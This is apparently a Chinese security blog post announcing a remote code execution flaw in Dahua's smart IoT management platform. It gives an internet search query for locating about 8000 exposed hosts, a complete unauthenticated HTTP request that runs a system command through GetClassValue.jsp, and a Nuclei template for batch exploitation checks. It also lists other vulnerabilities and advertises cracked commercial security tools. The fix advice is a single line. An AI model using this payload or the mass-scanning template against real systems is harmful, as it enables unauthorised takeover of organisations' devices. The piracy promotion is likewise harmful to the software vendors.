大华智能物联综合管理平台RCE远程代码执行漏洞-影响资产8000+| 漏洞预警
大华智能物联综合管理平台RCE远程代码执行漏洞-影响资产8000+| 漏洞预警
原创 漏洞复现Tony 渗透安全HackTwo 2025-01-03 16:00
0x01 产品简介
大华智能物联综合管理平台,作为浙江大华技术股份有限公司推出的一款集成了多项业务管理功能的平台软件,该平台主要面向智能园区、商业综合体等多种应用场景,旨在提供一个全面、高效的解决方案,为客户提供一套集成、高效、开放、灵活可扩展、可定制的平台软件产品。功能全面、灵活可扩展、安全可靠的智能物联基础软件平台,能够满足企业在不同场景下的各种业务需求,助力企业实现数智化转型升级。利用zoomeye测绘引擎搜索发现影响资产8000+。
POC在末尾下载
本周星球新增1day/0day漏洞-公告及声明****
朗速ERP UEditorAjaxApi.ashx 存在SSRF漏洞
officeweb365 弱口令漏洞
Cleo 远程代码执行漏洞
内训宝企业培训平台 uploadscormRCE漏洞
明源地产ERP VisitorWeb SQL注入漏洞
WordPress Crypto 插件 身份认证绕过漏洞
unibox checkstatus_ping.php 命令执行漏洞
博友校园务收费管理平台 getstudent 信息泄露
急诊综合管理平台 ServicePage任意文件读取漏洞
校盈家财务收费管理平台 getstudent 信息泄露
W&Jsoft-D-Security数据仿泄露系统(DLP)任意文件读取漏洞
商业管理系统 Common.ashx 存在文件上传致RCE漏洞
TMS运输管理系统 GetDataBase存在信息泄露漏洞
致翔 OA uploaddisk 存在任意文件上传漏洞
Apache Traffic Control 存在 SQL 注入漏洞
大华智能物联综合管理平台GetClassValue远程代码执行漏洞
方正畅享全媒体新闻采编系统 imageProxy任意文件读取漏洞
时空物流运输管理系统SysData存在敏感信息泄露漏洞
虹安信息数据泄露防护平台initUserReg存在命令执行漏洞
蓝凌EKP系统fsscCommonPortlet.do存在未授权SQL注入漏洞
朗速ERP FileUploadApi.ashx 存在任意文件上传致RCE漏洞
一卡通系统 AddPkFreePartyMFCar 存在SQL注入漏洞
福建科立讯通信有限公司指挥调度send_fax.php存在命令执行漏洞
Tiandy-Easy7弱口令漏洞
卓软计量业务管理平台image存在任意文件读取漏洞
Wordpress Tutor LMS插件插件存在SQL注入漏洞
虹安Heimdall DLP数据泄漏防护系统 pushSetupSQL注入漏洞
科汛网校KesionEDU CheckOrder SQL注入漏洞
企企通互联网解决方案系统srm getuserinfo 存在信息泄露漏洞
数字化智能中台系统login存在SQL注入漏洞
博斯外贸管理软件V6.0 logined.jsp存在SQL注入漏洞
快云服务器小助手 getdetail 存在任意文件文件读取漏洞
赛诸葛数字化智能中台系统 login 存在SQL注入漏洞
网神SecFox运维安全管理与审计系统 FastJson反序列化RCE漏洞
用友-友数聚科技CPAS审计管理系统V4 SQL注入漏洞
西联软件移动门店管理系统 StreamToFile 存在文件上传致RCE漏洞
科汛网校KesionEDU CheckOrder SQL注入漏洞
博斯外贸管理软件V6.0 loginednew.jsp 存在SQL注入漏洞
网上阅卷系统存在弱口令漏洞
卓软计量业务管理平台 image.ashx 任意文件读取漏洞
WordPress File Upload 插件存在任意文件读取漏洞
当虹科技 Arcvideo Live存在任意文件上传漏洞
声明:
请自行搭建环境进行漏洞测试,该公众号或作者星球分享的工具、项目、漏洞仅供安全研究与学习之用请勿用于非法行为,如用于其他用途,由使用者承担全部法律及连带责任,与作者和本公众号无关。
TIPS:
末尾领取资料及福利-批量检测脚本在末尾
0x02 漏洞描述 大华智能物联综合管理平台 GetClassValue.jsp 接口存在远程代码执行漏洞,未经身份验证的恶意攻击者可以利用该漏洞远程执行任意命令,获取系统权限。0x03 Zoomeye语法app=”大华ICC智能物联综合管理平台”0x04 漏洞复现request packet(NucleiPOC在末尾)POST /evo-apigw/admin/API/Developer/GetClassValue.jsp HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/jsonContent-Length: 207 { “data”: { “clazzName”: “com.dahua.admin.util.RuntimeUtil”, “methodName”: “syncexecReturnInputStream”, “fieldName”: [“id”] } }Nuclei批量检测POC(末尾有Nuclei批量检测POC)0x05 修复建议关闭互联网暴露面或接口设置访问权限,建议升级到最新版。0x06 内部VIP星球介绍-V1.3 如果你想学习更多渗透挖洞技术/技巧欢迎加入我们内部星球可获得内部工具字典和享受内部,每周一至五周更新1day/0day漏洞刷分上分(2025POC更新至3000+),包含网上一些付费工具BurpSuite漏洞检测插件,Fofa高级会员,CTFshow等各种账号会员共享。详情直接点击下方链接进入了解,觉得价格高的师傅可后台回复” 星球 “有优惠券名额有限先到先得!后续资源会更丰富在加入还是低价!(价格随资源人数进行上涨早加入早享受)👉点击了解加入–>>内部VIP知识星球福利介绍V1.3版本-1day/0day漏洞及内部资源每日更新Nuclei-YamlPocid: dahua-GetClassValue-RCEinfo: name: dahua-GetClassValue-RCE author: HK severity: high metadata: fofa-query: app=”dahua-智能物联综合管理平台”http: – raw: – | POST /evo-apigw/admin/API/Developer/GetClassValue.jsp HTTP/1.1 Host: {{Hostname}} Content-Type: application/json Content-Length: 222 { “data”: { “clazzName”: “com.dahua.admin.util.RuntimeUtil”, “methodName”: “syncexecReturnInputStream”, “fieldName”: [“id”] } } matchers-condition: and matchers: – type: word words: – “uid=0” – type: status status: – 200
结尾
免责声明
获取方法
回复“app
” 获取 app渗透和app抓包教程
回复“渗透字典” 获取 针对一些字典重新划分处理,收集了几个密码管理字典生成器用来扩展更多字典的仓库。
回复“书籍” 获取 网络安全相关经典书籍电子版pdf
压缩包解压密码:HackTwo
免责声明
文章中的案例或工具仅面向合法授权的企业安全建设行为,如您需要测试内容的可用性,请自行搭建靶机环境,勿用于非法行为。如
用于其他用途,由使用者承担全部法律及连带责任,与作者和本公众号无关。
本项目所有收录的poc均为漏洞的理论判断,不存在漏洞利用过程,不会对目标发起真实攻击和漏洞利用。文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用。
如您在使用本工具或阅读文章的过程中存在任何非法行为,您需自行承担相应后果,我们将不承担任何法律及连带责任。
本工具或文章或来源于网络,若有侵权请联系作者删除,请在24小时内删除,请勿用于商业行为,自行查验是否具有后门,切勿相信软件内的广告!
往期推荐
1. 内部VIP知识星球福利介绍V1.3版本
2. 最新BurpSuite2024.11.2专业(稳定版)
3. 最新Nessus2024.12.04版本主机漏洞扫描下载
4. 最新xray1.9.11高级版下载Windows/Linux
5. 最新HCL AppScan Standard 10.4.128273破解版下载
渗透安全HackTwo
微信号:关注公众号获取
后台回复星球加入:
知识星球
扫码关注 了解更多
喜欢的朋友可以点赞转发支持一下